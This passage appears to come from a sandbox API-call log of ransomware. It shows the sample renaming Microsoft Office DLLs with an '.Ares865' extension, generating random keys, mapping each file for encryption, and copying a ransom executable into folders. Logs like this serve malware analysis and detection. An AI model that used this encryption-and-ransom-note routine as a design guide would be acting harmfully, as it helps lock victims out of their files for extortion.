hHeap=0x2b0000) returned 1 [0129.472] lstrcpyW (in: lpString1=0x2cce462, lpString2="UMLVB.DLL" | out: lpString1="UMLVB.DLL") returned="UMLVB.DLL" [0129.472] lstrlenW (lpString="UMLVB.DLL") returned 9 [0129.472] lstrlenW (lpString="Ares865") returned 7 [0129.472] lstrcmpiW (lpString1="LVB.DLL", lpString2="Ares865") returned 1 [0129.472] lstrlenW (lpString=".dll") returned 4 [0129.472] lstrcmpiW (lpString1="UMLVB.DLL", lpString2=".dll") returned 1 [0129.472] lstrlenW (lpString=".lnk") returned 4 [0129.472] lstrcmpiW (lpString1="UMLVB.DLL", lpString2=".lnk") returned 1 [0129.472] lstrlenW (lpString=".ini") returned 4 [0129.472] lstrcmpiW (lpString1="UMLVB.DLL", lpString2=".ini") returned 1 [0129.472] lstrlenW (lpString=".sys") returned 4 [0129.472] lstrcmpiW (lpString1="UMLVB.DLL", lpString2=".sys") returned 1 [0129.472] lstrlenW (lpString="UMLVB.DLL") returned 9 [0129.472] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVB.DLL.Ares865") returned 66 [0129.473] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvb.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVB.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvb.dll.ares865"), dwFlags=0x1) returned 1 [0129.475] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVB.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvb.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.475] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=140648) returned 1 [0129.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.476] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.476] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.476] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.477] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x22870, lpName=0x0) returned 0x170 [0129.478] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x22870) returned 0x420000 [0129.485] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.486] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.486] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.486] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.488] lstrcpyW (in: lpString1=0x2cce462, lpString2="UMLVC60.DLL" | out: lpString1="UMLVC60.DLL") returned="UMLVC60.DLL" [0129.488] lstrlenW (lpString="UMLVC60.DLL") returned 11 [0129.488] lstrlenW (lpString="Ares865") returned 7 [0129.489] lstrcmpiW (lpString1="C60.DLL", lpString2="Ares865") returned 1 [0129.489] lstrlenW (lpString=".dll") returned 4 [0129.489] lstrcmpiW (lpString1="UMLVC60.DLL", lpString2=".dll") returned 1 [0129.489] lstrlenW (lpString=".lnk") returned 4 [0129.489] lstrcmpiW (lpString1="UMLVC60.DLL", lpString2=".lnk") returned 1 [0129.489] lstrlenW (lpString=".ini") returned 4 [0129.489] lstrcmpiW (lpString1="UMLVC60.DLL", lpString2=".ini") returned 1 [0129.489] lstrlenW (lpString=".sys") returned 4 [0129.489] lstrcmpiW (lpString1="UMLVC60.DLL", lpString2=".sys") returned 1 [0129.489] lstrlenW (lpString="UMLVC60.DLL") returned 11 [0129.489] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVC60.DLL.Ares865") returned 68 [0129.489] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVC60.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvc60.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVC60.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvc60.dll.ares865"), dwFlags=0x1) returned 1 [0129.492] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVC60.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvc60.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.492] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=141160) returned 1 [0129.492] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.492] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.492] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.492] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.493] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.493] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.493] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x22a70, lpName=0x0) returned 0x170 [0129.494] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x22a70) returned 0x420000 [0129.502] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.503] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.503] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.503] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.505] lstrcpyW (in: lpString1=0x2cce462, lpString2="UMLVS.DLL" | out: lpString1="UMLVS.DLL") returned="UMLVS.DLL" [0129.506] lstrlenW (lpString="UMLVS.DLL") returned 9 [0129.506] lstrlenW (lpString="Ares865") returned 7 [0129.506] lstrcmpiW (lpString1="LVS.DLL", lpString2="Ares865") returned 1 [0129.506] lstrlenW (lpString=".dll") returned 4 [0129.506] lstrcmpiW (lpString1="UMLVS.DLL", lpString2=".dll") returned 1 [0129.506] lstrlenW (lpString=".lnk") returned 4 [0129.506] lstrcmpiW (lpString1="UMLVS.DLL", lpString2=".lnk") returned 1 [0129.506] lstrlenW (lpString=".ini") returned 4 [0129.506] lstrcmpiW (lpString1="UMLVS.DLL", lpString2=".ini") returned 1 [0129.506] lstrlenW (lpString=".sys") returned 4 [0129.506] lstrcmpiW (lpString1="UMLVS.DLL", lpString2=".sys") returned 1 [0129.506] lstrlenW (lpString="UMLVS.DLL") returned 9 [0129.506] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVS.DLL.Ares865") returned 66 [0129.506] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVS.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvs.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVS.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvs.dll.ares865"), dwFlags=0x1) returned 1 [0129.509] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVS.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvs.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.509] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=246648) returned 1 [0129.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.509] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.510] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.510] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.510] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3c680, lpName=0x0) returned 0x170 [0129.511] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3c680) returned 0x420000 [0129.534] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.535] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.535] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.539] lstrcpyW (in: lpString1=0x2cce462, lpString2="URLREDIR.DLL" | out: lpString1="URLREDIR.DLL") returned="URLREDIR.DLL" [0129.539] lstrlenW (lpString="URLREDIR.DLL") returned 12 [0129.539] lstrlenW (lpString="Ares865") returned 7 [0129.539] lstrcmpiW (lpString1="DIR.DLL", lpString2="Ares865") returned 1 [0129.539] lstrlenW (lpString=".dll") returned 4 [0129.539] lstrcmpiW (lpString1="URLREDIR.DLL", lpString2=".dll") returned 1 [0129.539] lstrlenW (lpString=".lnk") returned 4 [0129.539] lstrcmpiW (lpString1="URLREDIR.DLL", lpString2=".lnk") returned 1 [0129.539] lstrlenW (lpString=".ini") returned 4 [0129.539] lstrcmpiW (lpString1="URLREDIR.DLL", lpString2=".ini") returned 1 [0129.539] lstrlenW (lpString=".sys") returned 4 [0129.539] lstrcmpiW (lpString1="URLREDIR.DLL", lpString2=".sys") returned 1 [0129.539] lstrlenW (lpString="URLREDIR.DLL") returned 12 [0129.539] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\URLREDIR.DLL.Ares865") returned 69 [0129.539] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\URLREDIR.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\urlredir.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\URLREDIR.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\urlredir.dll.ares865"), dwFlags=0x1) returned 1 [0129.552] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\URLREDIR.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\urlredir.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.552] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=561552) returned 1 [0129.552] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.553] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.553] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.553] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x89490, lpName=0x0) returned 0x170 [0129.555] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x89490) returned 0x420000 [0129.624] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.624] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.625] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.633] lstrcpyW (in: lpString1=0x2cce462, lpString2="VVIEWDWG.DLL" | out: lpString1="VVIEWDWG.DLL") returned="VVIEWDWG.DLL" [0129.633] lstrlenW (lpString="VVIEWDWG.DLL") returned 12 [0129.633] lstrlenW (lpString="Ares865") returned 7 [0129.633] lstrcmpiW (lpString1="DWG.DLL", lpString2="Ares865") returned 1 [0129.633] lstrlenW (lpString=".dll") returned 4 [0129.633] lstrcmpiW (lpString1="VVIEWDWG.DLL", lpString2=".dll") returned 1 [0129.633] lstrlenW (lpString=".lnk") returned 4 [0129.633] lstrcmpiW (lpString1="VVIEWDWG.DLL", lpString2=".lnk") returned 1 [0129.633] lstrlenW (lpString=".ini") returned 4 [0129.633] lstrcmpiW (lpString1="VVIEWDWG.DLL", lpString2=".ini") returned 1 [0129.633] lstrlenW (lpString=".sys") returned 4 [0129.633] lstrcmpiW (lpString1="VVIEWDWG.DLL", lpString2=".sys") returned 1 [0129.633] lstrlenW (lpString="VVIEWDWG.DLL") returned 12 [0129.633] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWDWG.DLL.Ares865") returned 69 [0129.633] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWDWG.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\vviewdwg.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWDWG.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\vviewdwg.dll.ares865"), dwFlags=0x1) returned 1 [0129.636] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWDWG.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\vviewdwg.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.636] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5777784) returned 1 [0129.637] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.637] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.637] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.638] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x582c80, lpName=0x0) returned 0x170 [0129.639] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x182c80) returned 0x3030000 [0129.903] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.905] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.905] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.939] lstrcpyW (in: lpString1=0x2cce462, lpString2="VVIEWER.DLL" | out: lpString1="VVIEWER.DLL") returned="VVIEWER.DLL" [0129.939] lstrlenW (lpString="VVIEWER.DLL") returned 11 [0129.939] lstrlenW (lpString="Ares865") returned 7 [0129.939] lstrcmpiW (lpString1="WER.DLL", lpString2="Ares865") returned 1 [0129.939] lstrlenW (lpString=".dll") returned 4 [0129.939] lstrcmpiW (lpString1="VVIEWER.DLL", lpString2=".dll") returned 1 [0129.939] lstrlenW (lpString=".lnk") returned 4 [0129.939] lstrcmpiW (lpString1="VVIEWER.DLL", lpString2=".lnk") returned 1 [0129.939] lstrlenW (lpString=".ini") returned 4 [0129.939] lstrcmpiW (lpString1="VVIEWER.DLL", lpString2=".ini") returned 1 [0129.939] lstrlenW (lpString=".sys") returned 4 [0129.939] lstrcmpiW (lpString1="VVIEWER.DLL", lpString2=".sys") returned 1 [0129.939] lstrlenW (lpString="VVIEWER.DLL") returned 11 [0129.940] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWER.DLL.Ares865") returned 68 [0129.940] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWER.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\vviewer.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWER.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\vviewer.dll.ares865"), dwFlags=0x1) returned 1 [0129.945] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWER.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\vviewer.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.945] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4178792) returned 1 [0129.946] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.947] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.947] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.947] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3fc670, lpName=0x0) returned 0x170 [0129.949] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x1fc670) returned 0x3030000 [0130.135] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0130.136] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0130.136] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.189] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033") returned="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033" [0130.190] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033" | out: lpString1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033") returned="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033" [0130.190] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0130.190] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\how to back your files.exe"), bFailIfExists=1) returned 0 [0130.191] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0130.192] GetLastError () returned 0x0 [0130.193] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0130.193] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x528d8a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x528d8a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0130.194] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0130.194] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0130.194] lstrcpyW (in: lpString1=0x2cce46c, lpString2="BHOINTL.DLL" | out: lpString1="BHOINTL.DLL") returned="BHOINTL.DLL" [0130.194] lstrlenW (lpString="BHOINTL.DLL") returned 11 [0130.194] lstrlenW (lpString="Ares865") returned 7 [0130.194] lstrcmpiW (lpString1="NTL.DLL", lpString2="Ares865") returned 1 [0130.194] lstrlenW (lpString=".dll") returned 4 [0130.194] lstrcmpiW (lpString1="BHOINTL.DLL", lpString2=".dll") returned 1 [0130.194] lstrlenW (lpString=".lnk") returned 4 [0130.194] lstrcmpiW (lpString1="BHOINTL.DLL", lpString2=".lnk") returned 1 [0130.194] lstrlenW (lpString=".ini") returned 4 [0130.194] lstrcmpiW (lpString1="BHOINTL.DLL", lpString2=".ini") returned 1 [0130.194] lstrlenW (lpString=".sys") returned 4 [0130.194] lstrcmpiW (lpString1="BHOINTL.DLL", lpString2=".sys") returned 1 [0130.194] lstrlenW (lpString="BHOINTL.DLL") returned 11 [0130.195] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL.Ares865") returned 73 [0130.195] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\bhointl.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\bhointl.dll.ares865"), dwFlags=0x1) returned 1 [0130.198] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\bhointl.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0130.198] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10104) returned 1 [0130.198] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0130.199] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0130.199] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.200] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2a80, lpName=0x0) returned 0x170 [0130.201] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2a80) returned 0x190000 [0130.203] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0130.203] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0130.203] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.204] lstrcpyW (in: lpString1=0x2cce46c, lpString2="DL_RES.DLL" | out: lpString1="DL_RES.DLL") returned="DL_RES.DLL" [0130.204] lstrlenW (lpString="DL_RES.DLL") returned 10 [0130.204] lstrlenW (lpString="Ares865") returned 7 [0130.204] lstrcmpiW (lpString1="RES.DLL", lpString2="Ares865") returned 1 [0130.204] lstrlenW (lpString=".dll") returned 4 [0130.204] lstrcmpiW (lpString1="DL_RES.DLL", lpString2=".dll") returned 1 [0130.204] lstrlenW (lpString=".lnk") returned 4 [0130.204] lstrcmpiW (lpString1="DL_RES.DLL", lpString2=".lnk") returned 1 [0130.204] lstrlenW (lpString=".ini") returned 4 [0130.204] lstrcmpiW (lpString1="DL_RES.DLL", lpString2=".ini") returned 1 [0130.204] lstrlenW (lpString=".sys") returned 4 [0130.204] lstrcmpiW (lpString1="DL_RES.DLL", lpString2=".sys") returned 1 [0130.204] lstrlenW (lpString="DL_RES.DLL") returned 10 [0130.205] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL.Ares865") returned 72 [0130.205] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\dl_res.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\dl_res.dll.ares865"), dwFlags=0x1) returned 1 [0130.207] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\dl_res.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0130.207] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10632) returned 1 [0130.207] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 